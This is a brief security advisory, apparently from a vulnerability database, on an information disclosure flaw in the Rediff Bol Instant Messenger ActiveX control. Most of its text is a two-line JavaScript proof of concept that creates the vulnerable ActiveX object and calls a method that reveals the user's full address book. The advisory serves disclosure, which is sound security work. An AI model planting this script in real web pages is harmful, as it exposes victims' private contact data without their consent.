Rediff Bol Instant Messenger ActiveX Control Information Disclosure Vulnerability

Rediff Bol Instant Messenger ActiveX Control Information Disclosure Vulnerability

The following script was provided:

[script]
var Obj = new ActiveXObject("Fetch.FetchContact.1");
alert(Obj.FullAddressBook(0,"","",""));
[/script]